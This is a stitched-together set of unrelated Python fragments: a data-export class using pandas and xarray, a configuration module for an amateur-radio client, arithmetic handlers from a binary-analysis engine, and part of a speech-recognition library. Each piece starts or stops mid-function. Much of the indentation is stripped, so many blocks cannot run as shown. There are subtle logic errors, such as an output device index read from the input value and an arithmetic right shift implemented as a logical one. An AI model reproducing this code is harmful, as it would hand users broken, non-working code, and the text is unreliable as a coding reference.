@contents.setter
def contents(self, value):
if not isinstance(value, list):
raise TypeError("ReturnedData.contents should be a list")
for i in value:
if not isinstance(i, ReturnedDataFile):
raise TypeError(
"Items in ReturnedData.contents should be"
"of type ReturnedDataFile")
self._contents = value
    def as_dataframe(self, expand=False):
        """Convert the data to a pandas DataFrame.
        If expand is True, expand some columns, e.g.:
        B_NEC -> B_NEC_N, B_NEC_E, B_NEC_C
        B_VFM -> B_VFM_i, B_VFM_j, B_VFM_k
        Args:
            expand (bool)
        Returns:
            pandas.DataFrame
        """
        # Each file part converts itself; the parts are then stacked row-wise.
        return pandas.concat(
            [d.as_dataframe(expand=expand) for d in self.contents])
def as_xarray(self, reshape=False):
"""Convert the data to an xarray Dataset.
Args:
reshape (bool): Reshape to a convenient higher dimensional form
Returns:
xarray.Dataset
"""
# ds_list is a list of xarray.Dataset objects
# - they are created from each file in self.contents
# Some of them may be empty because of the time window they cover
# and the filtering that has been applied.
ds_list = []
for i, data in enumerate(self.contents):
ds_part = data.as_xarray(reshape=reshape)
if ds_part is None:
print("Warning: ",
"Unable to create dataset from part {} of {}".format(
i+1, len(self.contents)),
"\n(This part is likely empty)")
else:
# Collect the non-empty Datasets
ds_list.append(ds_part)
if len(ds_list) == 1:
ds = ds_list[0]
else:
ds_list = [i for i in ds_list if i is not None]
if ds_list == []:
return None
ds = xarray.concat(ds_list, dim="Timestamp")
# # Test this other option:
# ds = self.contents[0].as_xarray()
# for d in self.contents[1:]:
# ds = xarray.concat([ds, d.as_xarray()], dim="Timestamp")
# return ds
#
# https://github.com/pydata/xarray/issues/1379
# concat is slow. Maybe try extracting numpy arrays and rebuilding ds
# Set the original data sources and models used as metadata
ds.attrs["Sources"] = self.sources
ds.attrs["MagneticModels"] = self.magnetic_models
ds.attrs["RangeFilters"] = self.range_filters
return ds
def to_files(self, paths, overwrite=False):
"""Saves the data to the specified files.
Only write to file if it does not yet exist, or if overwrite=True.
Currently handles CSV and CDF formats.
Args:
paths (list of str): paths to the files to save as
overwrite (bool): Will overwrite existing file if True
"""
nfiles = len(self.contents)
if not isinstance(paths, list) or not isinstance(paths[0], str):
raise TypeError("paths must be a list of strings")
if len(paths) != nfiles:
raise Exception(
"Number of paths must equal number of files ({})".format(
nfiles
))
for path, retdata in zip(paths, self.contents):
retdata.to_file(path, overwrite)
def to_file(self, path, overwrite=False):
"""Saves the data to the specified file, when data is only in one file.
Only write to file if it does not yet exist, or if overwrite=True.
Currently handles CSV and CDF formats.
.. note::
This is currently only implemented for smaller data when the
request has not been split into multiple requests - | |
# -*- coding: utf-8 -*-
#
# qtUC - pyUC with a QT interface
# Based on the original pyUC code, modified for QT5 use
# <NAME> - VK3VW - <EMAIL>
#
# pyUC ("puck")
# Copyright (C) 2014, 2015, 2016, 2019, 2020, 2021 N4IRR
#
# This software is for use on amateur radio networks only, it is to be used
# for educational purposes only. Its use on commercial networks is strictly
# prohibited. Permission to use, copy, modify, and/or distribute this software
# is hereby granted, provided that the above copyright notice and this
# permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND DVSWITCH DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL N4IRR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
# --------------------------------------------------------------------------- #
from logging import exception
import sys
import os
from pathlib import Path
import configparser
from PyQt5.QtCore import QSettings
import qtUC_util as ut
import qtUC_defs as defs
DOCPATH = os.path.join(os.path.expanduser('~'), 'Documents', 'qtUC')
CFGFILE = 'qtUC.ini'
# LOCAL_CFGFILE = 'qtUC_local.ini'
TGMACFILE = 'qtUC_tgmac.ini'
# Class to hold all the configuration variables used
class qtUCVars():
    """Namespace for all qtUC configuration state.

    All settings are class-level attributes, so the class itself is used as
    a shared configuration object (methods are typically invoked with the
    class as `self` rather than on an instance).
    """
    # flags / internal
    valid = False                # True once validateConfigInfo() passes
    cfgfile = CFGFILE            # path set properly by setupPaths()
    # local_cfgfile = LOCAL_CFGFILE
    tgmacfile = TGMACFILE        # talk group / macro overrides file
    # must have
    my_call = 'NOCALL'
    subscriber_id = 0
    repeater_id = 1
    ip_address = ''
    # should have
    usrp_tx_port = 50100
    usrp_rx_port = 50100
    defaultServer = 'DMR'
    useQRZ = True
    SAMPLE_RATE = 48000 # Default audio sample rate for pyaudio (will be resampled to 8K)
    out_index = None # Current output (speaker) index in the pyaudio device list
    in_index = None # Current input (mic) index in the pyaudio device list
    loopback = False # NOT USED?
    dongle_mode = False # NOT USED?
    mic_vol = 50 # NOT USED?
    sp_vol = 50 # NOT USED?
    vox_enable = False
    vox_threshold = 200  # VOX trigger level
    vox_delay = 50       # VOX hang time
    slot = 2             # DMR timeslot
    asl_mode = 0
    minToTray = False # minimize to tray instead of closing
    pttToggle = False
    txTimeout = 200
    shortCalls = True
    theme = 'system'
    loglevel = 'Info'
    # some basic details in case something barfs
    talk_groups = {
        'DMR': [('Disconnect', '4000'), ('Parrot', "9990#")],
        'P25': [('Disconnect', '9999'), ('Parrot', '10')],
        'YSF': [('Disconnect', 'disconnect'), ('Parrot', 'register.ysfreflector.de:42020')],
        'NXDN': [('Unlink', '9999'), ('Parrot', '10')],
        'DSTAR': [('Unlink', ' U'), ('Echo', 'REF001EL')]
    }
    macros = {}
    radmenu = {}
    noQuote = {ord('"'): ''}  # translate table to strip double quotes
    # servers = sorted(talk_groups.keys())
    # connected_msg = defs.STRING_CONNECTED_TO
    level_every_sample = 1
    NAT_ping_timer = 0
    def __init__(self):
        """No per-instance state: all settings live on the class itself."""
        pass
    def setupPaths(self):
        """Decide where the config and TG/macro ini files live.

        Prefers the per-user Documents/qtUC directory when it already
        exists; otherwise falls back to the application directory and
        attempts to create the Documents dir for subsequent runs.
        """
        # Assume the default config file name is in the same dir as .py file
        apppath = str(Path(sys.argv[0]).parent)
        # self.cfgfile = os.path.join(apppath, CFGFILE)
        self.cfgfile = os.path.join(apppath, CFGFILE)
        self.tgmacfile = os.path.join(apppath, TGMACFILE)
        # be smart - should have been created in utils if non existent
        if not os.path.isdir(DOCPATH):
            try:
                os.makedirs(DOCPATH)
                ut.log.info('Created qtUC documents directory - ' + DOCPATH)
            except Exception:
                # best-effort: silently keep the app-dir paths if creation fails
                pass
            # NOTE(review): even when makedirs succeeds, the app-dir paths are
            # used for this run; DOCPATH is only picked up once it pre-exists.
            # Confirm this first-run behaviour is intended.
        else:
            self.cfgfile = os.path.join(DOCPATH, CFGFILE)
            # self.local_cfgfile = os.path.join(DOCPATH, LOCAL_CFGFILE)
            self.tgmacfile = os.path.join(DOCPATH, TGMACFILE)
        ut.log.info('Using base configuration ' + self.cfgfile)
        # ut.log.info('Local configuration ' + self.local_cfgfile)
def validateConfigInfo(self):
self.valid = (self.my_call != "N0CALL") # Make sure they set a callsign
self.valid &= (self.subscriber_id != 0) # Make sure they set a DMR/CCS7 ID
self.valid &= (self.ip_address != "") # Make sure they have a valid address for AB
self.valid &= (self.ip_address != "1.2.3.4")
if not self.valid:
ut.log.info(defs.STRING_CONFIG_NOT_EDITED)
# return valid
    def loadConfig(self):
        """Load configuration from the default or command-line-supplied file.

        NOTE(review): methods are invoked as self.method(self); this only
        works when qtUCVars is used as an uninstantiated class (unbound
        attribute access), not on an instance - confirm callers rely on that.

        NOTE(review): when a config path is passed on the command line, only
        cfgfile is updated and importConfig is never called for it - verify
        whether loadLocalConfig covers that case or this is a bug.
        """
        # Load data from the default or passed config file
        self.setupPaths(self) # setup some stuff
        # load base config from ini fil(s)
        if len(sys.argv) > 1:
            self.cfgfile = sys.argv[1] # Use the command line argument for the path to the config file
        else:
            self.importConfig(self) # load 'em
        # local overrides
        self.importLocal(self) # local updates to talkgroups and/or macros
        self.loadLocalConfig(self) # local UI settings and local details override
def importConfig(self):
# Parse config details
self.valid = False
config = configparser.ConfigParser(inline_comment_prefixes=(';',))
config.optionxform = lambda option: option
try:
try:
config.read(['./qtUC_dist.ini', self.cfgfile]) # check local dist for basic setup
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
# sys.exit('Configuration file \'' + cfgfile + '\' is not a valid configuration file! Exiting...')
return
# required
self.my_call = config.get('DEFAULTS', 'myCall', fallback='NOCALL').split(None)[0]
self.subscriber_id = int(config.get('DEFAULTS', 'subscriberID', fallback='0').split(None)[0])
self.repeater_id = int(config.get('DEFAULTS', 'repeaterID', fallback='1').split(None)[0])
self.ip_address = config.get('DEFAULTS', 'ipAddress', fallback='1.2.3.4').split(None)[0]
self.usrp_tx_port = [int(i) for i in config.get('DEFAULTS', 'usrpTxPort', fallback='12345').split(',')]
self.usrp_rx_port = int(config.get('DEFAULTS', 'usrpRxPort', fallback='50100').split(None)[0]) # normally the same port
self.defaultServer = config.get('DEFAULTS', 'defaultServer', fallback='DMR').split(None)[0]
# defaults
self.useQRZ = config.getboolean('DEFAULTS', 'useQRZ', fallback=True)
self.level_every_sample = int(config.get('DEFAULTS', 'levelEverySample', fallback='2'))
self.NAT_ping_timer = int(config.get('DEFAULTS', 'pingTimer', fallback='0'))
# self.loopback = bool(config.get('DEFAULTS', 'loopback', fallback=False).split(None)[0])
# self.dongle_mode = bool(config.get('DEFAULTS', 'dongleMode', fallback=False).split(None)[0])
self.vox_enable = config.getboolean('DEFAULTS', 'voxEnable', fallback=False) # .split(None)[0]
self.mic_vol = int(config.get('DEFAULTS', 'micVol', fallback='50').split(None)[0])
self.sp_vol = int(config.get('DEFAULTS', 'spVol', fallback='50').split(None)[0])
self.vox_threshold = int(config.get('DEFAULTS', 'voxThreshold', fallback='200').split(None)[0])
self.vox_delay = int(config.get('DEFAULTS', 'voxDelay', fallback='50').split(None)[0])
self.slot = int(config.get('DEFAULTS', 'slot', fallback='2').split(None)[0])
self.asl_mode = int(config.get('DEFAULTS', 'aslMode', fallback='0').split(None)[0])
# Audio devices
in_index = config.get('DEFAULTS', 'in_index', fallback='default')
if in_index.lower() == 'default':
self.in_index = None
else:
self.in_index = int(in_index)
out_index = config.get('DEFAULTS', 'out_index', fallback='default')
if out_index.lower() == 'default':
self.out_index = None # ?? or 0
else:
self.out_index = int(in_index)
# internal
self.minToTray = config.getboolean('DEFAULTS', 'minToTray', fallback=False)
self.pttToggle = config.getboolean('DEFAULTS', 'pttToggle', fallback=False)
self.shortCalls = config.getboolean('DEFAULTS', 'shortCalls', fallback=True)
self.txTimeout = int(config.get('DEFAULTS', 'txTimeout', fallback='200').split(None)[0])
# uc_background_color = readValue(config, 'DEFAULTS', 'backgroundColor', 'gray25', str)
# uc_text_color = readValue(config, 'DEFAULTS', 'textColor', 'white', str)
# talk_groups = {}
for sect in config.sections():
if (sect != "DEFAULTS") and (sect != "MACROS"):
self.talk_groups[sect] = config.items(sect)
# macros = {}
if "MACROS" in config.sections():
for x in config.items("MACROS"):
# self.macros[x[1]] = x[0]
self.macros[x[0]] = x[1] # use key: val not val: key :(
self.validateConfigInfo(self)
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Configuration file \'' + self.cfgfile + '\' is not a valid configuration file!')
def exportConfig(self):
# save current details
config = configparser.ConfigParser()
config.optionxform = str # preserve case ikeys/values
config.add_section('DEFAULTS')
config.set('DEFAULTS', 'myCall', self.my_call)
config.set('DEFAULTS', 'subscriberID', str(self.subscriber_id))
config.set('DEFAULTS', 'repeaterID', str(self.repeater_id))
config.set('DEFAULTS', 'ipAddress', self.ip_address)
config.set('DEFAULTS', 'usrpTxPort', str(self.usrp_tx_port))
config.set('DEFAULTS', 'usrpRxPort', str(self.usrp_rx_port))
config.set('DEFAULTS', 'defaultServer', self.defaultServer)
# defaults
config.set('DEFAULTS', 'useQRZ', self.useQRZ)
config.set('DEFAULTS', 'levelEverySample', str(self.level_every_sample))
config.set('DEFAULTS', 'pingTimer', str(self.NAT_ping_timer))
config.set('DEFAULTS', 'loopback', self.loopback)
config.set('DEFAULTS', 'dongleMode', self.dongle_mode)
config.set('DEFAULTS', 'voxEnable', self.vox_enable)
config.set('DEFAULTS', 'micVol', str(self.mic_vol))
config.set('DEFAULTS', 'spVol', str(self.sp_vol))
config.set('DEFAULTS', 'voxThreshold', str(self.vox_threshold))
config.set('DEFAULTS', 'voxDelay', str(self.vox_delay))
config.set('DEFAULTS', 'slot', str(self.slot))
config.set('DEFAULTS', 'aslMode', str(self.asl_mode))
# Audio devices
config.set('DEFAULTS', 'in_index', str(self.in_index))
config.set('DEFAULTS', 'out_index', str(self.out_index))
# internal
config.set('DEFAULTS', 'minToTray', self.minToTray)
config.set('DEFAULTS', 'pttToggle', self.pttToggle)
config.set('DEFAULTS', 'shortCalls', self.shortCalls)
config.set('DEFAULTS', 'txTimeout', str(self.txTimeout))
# talk_groups
tgkeys = list(self.talk_groups.keys())
for sect in tgkeys:
config.add_section(sect)
for itm in self.talk_groups[sect]:
config.set(str(sect), str(itm[0]), str(itm[1])) # itms are tuples (Disconnect, 4000) etc
# macros
config.add_section('MACROS')
for key in self.macros:
macval = str(self.macros[key])
config.set('MACROS', key, macval)
try:
with open(self.cfgfile, 'w') as cf:
config.write(cf)
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Unable to write configuration file \'' + self.cfgfile + '\'')
def importLocal(self):
# import any local tg/macro info
if not os.path.isfile(self.tgmacfile):
ut.log.info('TG/Macro file \'' + self.tgmacfile + '\' does not exist for import!')
return
config = configparser.ConfigParser(inline_comment_prefixes=(';',))
config.optionxform = lambda option: option
try:
try:
config.read(self.tgmacfile)
except Exception:
# ignore if the file does not exist
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('TG/Macro file \'' + self.tgmacfile + '\' is not a valid configuration file!')
return
# talk_groups
for sect in config.sections():
if sect != "MACROS": # no defaults here
self.talk_groups[sect] = config.items(sect)
# macros
if "MACROS" in config.sections():
for x in config.items("MACROS"):
# self.macros[x[1]] = x[0]
self.macros[x[0]] = x[1] # use key: val not val: key :(
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Local TG/Macros file \'' + self.tgmacfile + '\' is not a valid configuration file!')
def exportLocal(self):
# save current talk_groups and macros
config = configparser.ConfigParser()
config.optionxform = str # preserve case ikeys/values
# talkgroups
tgkeys = list(self.talk_groups.keys())
for sect in tgkeys:
config.add_section(sect)
for itm in self.talk_groups[sect]:
config.set(str(sect), str(itm[0]), str(itm[1])) # itms are tuples (Discount, 4000) etc
# macros
config.add_section('MACROS')
for key in self.macros: # keys of the macros dict
macval = str(self.macros[key])
config.set('MACROS', key, macval)
try:
| |
MultiValues(offset_to_values={0: {top}})
result: Optional[MultiValues] = None
for addr in addrs_v:
if not isinstance(addr, claripy.ast.Base):
continue
if addr.concrete:
# a concrete address
concrete_addr: int = addr._model_concrete.value
try:
vs: MultiValues = self.state.memory_definitions.load(concrete_addr, size=size, endness=expr.endness)
except SimMemoryMissingError:
continue
memory_location = MemoryLocation(concrete_addr, size, endness=expr.endness)
self.state.add_use(memory_location, self._codeloc(), expr=expr)
result = result.merge(vs) if result is not None else vs
elif self.state.is_stack_address(addr):
stack_offset = self.state.get_stack_offset(addr)
if stack_offset is not None:
stack_addr = self.state.live_definitions.stack_offset_to_stack_addr(stack_offset)
try:
vs: MultiValues = self.state.stack_definitions.load(stack_addr, size=size, endness=expr.endness)
except SimMemoryMissingError:
continue
memory_location = MemoryLocation(SpOffset(self.arch.bits, stack_offset), size, endness=expr.endness)
self.state.add_use(memory_location, self._codeloc(), expr=expr)
result = result.merge(vs) if result is not None else vs
else:
l.debug('Memory address %r undefined or unsupported at pc %#x.', addr, self.ins_addr)
if result is None:
top = self.state.top(bits)
# TODO: Annotate top with a definition
result = MultiValues(offset_to_values={0: {top}})
return result
def _ail_handle_Convert(self, expr: ailment.Expr.Convert) -> MultiValues:
to_conv: MultiValues = self._expr(expr.operand)
bits = expr.to_bits
size = bits // self.arch.byte_width
if len(to_conv.values) == 1 and 0 in to_conv.values:
values = to_conv.values[0]
else:
top = self.state.top(expr.to_bits)
# annotate it
dummy_atom = MemoryLocation(0, size, endness=self.arch.memory_endness)
top = self.state.annotate_with_def(top, Definition(dummy_atom, ExternalCodeLocation()))
# add use
self.state.add_use(dummy_atom, self._codeloc(), expr=expr)
return MultiValues(offset_to_values={0: {top}})
converted = set()
for v in values:
if expr.to_bits < expr.from_bits:
conv = v[expr.to_bits - 1:0]
elif expr.to_bits > expr.from_bits:
conv = claripy.ZeroExt(expr.to_bits - expr.from_bits, v)
else:
conv = v
converted.add(conv)
return MultiValues(offset_to_values={0: converted})
def _ail_handle_Reinterpret(self, expr: ailment.Expr.Reinterpret) -> MultiValues:
_: MultiValues = self._expr(expr.operand)
bits = expr.to_bits
# we currently do not support floating-point operations. therefore, we return TOP directly
reinterpreted = self.state.top(bits)
return MultiValues(offset_to_values={0: {reinterpreted}})
    def _ail_handle_ITE(self, expr: ailment.Expr.ITE) -> MultiValues:
        """Handle an If-Then-Else expression: evaluate all three
        sub-expressions (for their use-collection side effects) and return
        TOP, since the branch condition is not tracked precisely here.
        """
        _: MultiValues = self._expr(expr.cond)
        iftrue: MultiValues = self._expr(expr.iftrue)
        _: MultiValues = self._expr(expr.iffalse)
        # NOTE(review): relies on len() of a MultiValues yielding the value
        # width in bits; confirm against MultiValues.__len__ (expr.bits may
        # be the safer choice if they can disagree).
        top = self.state.top(len(iftrue))
        return MultiValues(offset_to_values={0: {top}})
def _ail_handle_Not(self, expr: ailment.Expr.UnaryOp) -> MultiValues:
operand: MultiValues = self._expr(expr.operand)
bits = expr.bits
r = None
operand_v = operand.one_value()
if operand_v is not None and operand_v.concrete:
r = MultiValues(offset_to_values={0: {~operand_v}})
else:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_BinaryOp(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
r = super()._ail_handle_BinaryOp(expr)
if isinstance(r, ailment.Expr.BinaryOp):
l.warning("Unimplemented operation %s.", expr.op)
top = self.state.top(expr.bits)
return MultiValues(offset_to_values={0: {top}})
return r
def _ail_handle_Add(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# adding a single value to a multivalue
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v + expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# adding a single value to a multivalue
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {v + expr0_v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
# adding two single values together
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v + expr1_v}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Sub(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# subtracting a single value from a multivalue
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v - expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# subtracting a single value from a multivalue
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {expr0_v - v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v - expr1_v}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Div(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
    def _ail_handle_DivMod(self, expr):
        # Combined divide/modulo is approximated exactly like a plain division:
        # operands are evaluated for their uses and the result is TOP.
        return self._ail_handle_Div(expr)
def _ail_handle_Mul(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Mull(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Shr(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# each value in expr0 >> expr1_v
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {(claripy.LShR(v, expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v >> each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {(claripy.LShR(expr0_v, v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {claripy.LShR(expr0_v, expr1_v._model_concrete.value)}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Sar(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# each value in expr0 >> expr1_v
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {(claripy.LShR(v, expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v >> each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {(claripy.LShR(expr0_v, v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v >> expr1_v._model_concrete.value}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
    def _ail_handle_Shl(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
        """Handle a shift-left.

        Concrete operands are folded with ``<<``; a concrete shift amount may be
        applied to every member of an all-concrete multivalue. Anything symbolic
        or multi-sourced degrades to TOP of the expression's width.
        """
        expr0: MultiValues = self._expr(expr.operands[0])
        expr1: MultiValues = self._expr(expr.operands[1])
        bits = expr.bits
        r = None
        expr0_v = expr0.one_value()
        expr1_v = expr1.one_value()
        if expr0_v is None and expr1_v is None:
            # Neither side collapses to a single value: return TOP.
            r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
        elif expr0_v is None and expr1_v is not None:
            # each value in expr0 << expr1_v
            if len(expr0.values) == 1 and 0 in expr0.values:
                if all(v.concrete for v in expr0.values[0]):
                    vs = {((v << expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
                          for v in expr0.values[0]}
                    r = MultiValues(offset_to_values={0: vs})
        elif expr0_v is not None and expr1_v is None:
            # expr0_v << each value in expr1 (comment fixed: this is a left shift)
            if len(expr1.values) == 1 and 0 in expr1.values:
                if all(v.concrete for v in expr1.values[0]):
                    vs = {((expr0_v << v._model_concrete.value) if v.concrete else self.state.top(bits))
                          for v in expr1.values[0]}
                    r = MultiValues(offset_to_values={0: vs})
        else:
            # Both sides are single values: fold only when both are concrete.
            if expr0_v.concrete and expr1_v.concrete:
                r = MultiValues(offset_to_values={0: {expr0_v << expr1_v._model_concrete.value}})
        if r is None:
            r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
        return r
def _ail_handle_And(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
if expr0_v is None and expr1_v is not None:
# expr1_v & each value in expr0
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v & expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v & each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {expr0_v & v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
# special handling for stack alignment
if | |
thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except TimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
    def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
        """
        Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
        The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
        To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
        The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
        Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
        Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
        """
        try: # attempt to use the Python 2 modules
            from urllib import urlencode
            from urllib2 import Request, urlopen, URLError, HTTPError
        except ImportError: # use the Python 3 modules
            from urllib.parse import urlencode
            from urllib.request import Request, urlopen
            from urllib.error import URLError, HTTPError
        assert isinstance(audio_data, AudioData), "Data must be audio data"
        assert isinstance(key, str), "`key` must be a string"
        assert isinstance(language, str), "`language` must be a string"
        # OAuth access tokens are cached on the instance so repeated calls reuse
        # them until expiry (see the "if allow_caching" blocks below).
        access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
        allow_caching = True
        try:
            from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
        except ImportError:
            try:
                from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
            except (ImportError, RuntimeError):
                expire_time = None # monotonic time not available, don't cache access tokens
                allow_caching = False # don't allow caching, since monotonic time isn't available
        if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
            # get an access token using OAuth
            credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
